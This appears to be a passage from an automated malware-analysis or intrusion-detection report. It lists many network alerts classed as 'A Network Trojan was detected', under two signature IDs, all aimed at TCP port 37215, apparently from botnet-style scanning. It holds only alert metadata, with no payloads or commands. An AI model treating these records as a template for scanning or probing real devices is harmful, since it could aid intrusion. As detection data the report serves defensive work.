                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810323
                  SID:2829579
                  Source Port:43590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791315
                  SID:2829579
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844798
                  SID:2835222
                  Source Port:39086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907642
                  SID:2835222
                  Source Port:52770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293627
                  SID:2829579
                  Source Port:59372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316018
                  SID:2829579
                  Source Port:55740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775971
                  SID:2829579
                  Source Port:48758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845740
                  SID:2835222
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649662
                  SID:2829579
                  Source Port:44126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788942
                  SID:2835222
                  Source Port:40546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510246
                  SID:2829579
                  Source Port:32914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887500
                  SID:2835222
                  Source Port:49042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585512
                  SID:2829579
                  Source Port:48104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910531
                  SID:2829579
                  Source Port:43604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887272
                  SID:2829579
                  Source Port:33334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912833
                  SID:2835222
                  Source Port:41056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810001
                  SID:2835222
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719152
                  SID:2835222
                  Source Port:41724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664553
                  SID:2829579
                  Source Port:51012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527238
                  SID:2835222
                  Source Port:46046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793596
                  SID:2835222
                  Source Port:36728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.793265
                  SID:2835222
                  Source Port:34446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886861
                  SID:2835222
                  Source Port:36582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312379
                  SID:2835222
                  Source Port:50304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771397
                  SID:2829579
                  Source Port:49240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547492
                  SID:2835222
                  Source Port:41986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591443
                  SID:2835222
                  Source Port:45690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596893
                  SID:2829579
                  Source Port:51724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312570
                  SID:2835222
                  Source Port:39456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886284
                  SID:2835222
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689605
                  SID:2829579
                  Source Port:39500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791643
                  SID:2835222
                  Source Port:58362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837199
                  SID:2829579
                  Source Port:36572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590453
                  SID:2835222
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695249
                  SID:2829579
                  Source Port:39294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529986
                  SID:2835222
                  Source Port:42614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.700265
                  SID:2835222
                  Source Port:51278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790352
                  SID:2835222
                  Source Port:36568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786495
                  SID:2835222
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665496
                  SID:2835222
                  Source Port:57584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906967
                  SID:2835222
                  Source Port:38844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849042
                  SID:2829579
                  Source Port:44546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536177
                  SID:2829579
                  Source Port:48510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910536
                  SID:2829579
                  Source Port:49388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551131
                  SID:2835222
                  Source Port:39010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775936
                  SID:2835222
                  Source Port:43564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781010
                  SID:2835222
                  Source Port:50494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577912
                  SID:2829579
                  Source Port:55442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578064
                  SID:2835222
                  Source Port:50516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.698861
                  SID:2835222
                  Source Port:50426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793688
                  SID:2835222
                  Source Port:43712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847693
                  SID:2835222
                  Source Port:53498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793474
                  SID:2829579
                  Source Port:55614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278769
                  SID:2835222
                  Source Port:47854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.909408
                  SID:2829579
                  Source Port:52332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767639
                  SID:2829579
                  Source Port:54766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791532
                  SID:2829579
                  Source Port:50650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492205
                  SID:2835222
                  Source Port:47126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661311
                  SID:2829579
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682944
                  SID:2835222
                  Source Port:36766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923912
                  SID:2829579
                  Source Port:55486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546751
                  SID:2829579
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629234
                  SID:2829579
                  Source Port:60628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530492
                  SID:2829579
                  Source Port:42126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795418
                  SID:2829579
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529064
                  SID:2829579
                  Source Port:38816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628050
                  SID:2829579
                  Source Port:50240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844926
                  SID:2835222
                  Source Port:59556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927172
                  SID:2835222
                  Source Port:57156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658917
                  SID:2829579
                  Source Port:33538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547665
                  SID:2835222
                  Source Port:48394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651410
                  SID:2835222
                  Source Port:60438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.794768
                  SID:2835222
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622269
                  SID:2835222
                  Source Port:48040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821083
                  SID:2829579
                  Source Port:36944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927227
                  SID:2835222
                  Source Port:42922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549097
                  SID:2835222
                  Source Port:49008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696076
                  SID:2829579
                  Source Port:47604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2829579
                  Source Port:34322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586119
                  SID:2835222
                  Source Port:41008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737951
                  SID:2829579
                  Source Port:40974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279380
                  SID:2829579
                  Source Port:45064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.544343
                  SID:2835222
                  Source Port:56404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750011
                  SID:2835222
                  Source Port:59292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323165
                  SID:2829579
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315992
                  SID:2829579
                  Source Port:40678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682940
                  SID:2835222
                  Source Port:54618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765947
                  SID:2829579
                  Source Port:44324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766674
                  SID:2835222
                  Source Port:55760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628854
                  SID:2829579
                  Source Port:34086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315973
                  SID:2829579
                  Source Port:40910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.879989
                  SID:2835222
                  Source Port:49484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650288
                  SID:2829579
                  Source Port:46306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798247
                  SID:2835222
                  Source Port:48758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910596
                  SID:2829579
                  Source Port:49994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535984
                  SID:2829579
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488149
                  SID:2835222
                  Source Port:37446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.701034
                  SID:2835222
                  Source Port:34884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713743
                  SID:2829579
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887137
                  SID:2835222
                  Source Port:34272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719418
                  SID:2829579
                  Source Port:45760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785792
                  SID:2829579
                  Source Port:55906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537491
                  SID:2829579
                  Source Port:47080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845174
                  SID:2835222
                  Source Port:52894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886788
                  SID:2829579
                  Source Port:47788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611107
                  SID:2829579
                  Source Port:39992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900444
                  SID:2829579
                  Source Port:34202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769332
                  SID:2829579
                  Source Port:45964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496126
                  SID:2829579
                  Source Port:42262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806140
                  SID:2829579
                  Source Port:35154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276816
                  SID:2829579
                  Source Port:43256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906972
                  SID:2829579
                  Source Port:42788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695690
                  SID:2829579
                  Source Port:47368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601717
                  SID:2829579
                  Source Port:40436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627726
                  SID:2835222
                  Source Port:36902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604089
                  SID:2829579
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628984
                  SID:2835222
                  Source Port:35766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750019
                  SID:2829579
                  Source Port:34258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591844
                  SID:2835222
                  Source Port:37760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908531
                  SID:2829579
                  Source Port:47108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604402
                  SID:2829579
                  Source Port:42930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629184
                  SID:2835222
                  Source Port:42638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786497
                  SID:2835222
                  Source Port:53570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927153
                  SID:2835222
                  Source Port:40132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656536
                  SID:2829579
                  Source Port:43746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843622
                  SID:2835222
                  Source Port:33148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319136
                  SID:2829579
                  Source Port:59432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788925
                  SID:2829579
                  Source Port:35374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315497
                  SID:2829579
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279388
                  SID:2835222
                  Source Port:56780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278718
                  SID:2835222
                  Source Port:54808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577108
                  SID:2835222
                  Source Port:44082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592771
                  SID:2835222
                  Source Port:49764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661259
                  SID:2835222
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.882572
                  SID:2835222
                  Source Port:53198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661273
                  SID:2835222
                  Source Port:36226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316232
                  SID:2829579
                  Source Port:51828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318347
                  SID:2829579
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495067
                  SID:2835222
                  Source Port:34896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665527
                  SID:2829579
                  Source Port:44840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316335
                  SID:2829579
                  Source Port:53836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316008
                  SID:2835222
                  Source Port:49848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793554
                  SID:2835222
                  Source Port:51586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586920
                  SID:2829579
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.682847
                  SID:2829579
                  Source Port:45028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494891
                  SID:2835222
                  Source Port:49000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296026
                  SID:2829579
                  Source Port:32942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586505
                  SID:2829579
                  Source Port:38702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493050
                  SID:2835222
                  Source Port:38032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.605911
                  SID:2835222
                  Source Port:55884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753911
                  SID:2835222
                  Source Port:33148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622207
                  SID:2835222
                  Source Port:55392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767844
                  SID:2829579
                  Source Port:42838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300964
                  SID:2835222
                  Source Port:57958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702556
                  SID:2829579
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577250
                  SID:2835222
                  Source Port:38218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.881305
                  SID:2835222
                  Source Port:52358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931488
                  SID:2829579
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881181
                  SID:2835222
                  Source Port:60782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277368
                  SID:2835222
                  Source Port:34198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678132
                  SID:2835222
                  Source Port:40264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769308
                  SID:2835222
                  Source Port:59546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316643
                  SID:2829579
                  Source Port:56420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907891
                  SID:2835222
                  Source Port:55378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880078
                  SID:2835222
                  Source Port:45188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910199
                  SID:2829579
                  Source Port:49198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920836
                  SID:2829579
                  Source Port:41782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607430
                  SID:2829579
                  Source Port:51632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845753
                  SID:2835222
                  Source Port:40738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529302
                  SID:2829579
                  Source Port:60280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755601
                  SID:2835222
                  Source Port:44304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583606
                  SID:2835222
                  Source Port:34556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661760
                  SID:2835222
                  Source Port:37554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493433
                  SID:2835222
                  Source Port:44800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578990
                  SID:2835222
                  Source Port:58662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729807
                  SID:2835222
                  Source Port:43068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529914
                  SID:2835222
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846085
                  SID:2835222
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911651
                  SID:2829579
                  Source Port:55596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.925848
                  SID:2835222
                  Source Port:49708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771095
                  SID:2829579
                  Source Port:40712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719087
                  SID:2835222
                  Source Port:43924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729727
                  SID:2835222
                  Source Port:32878
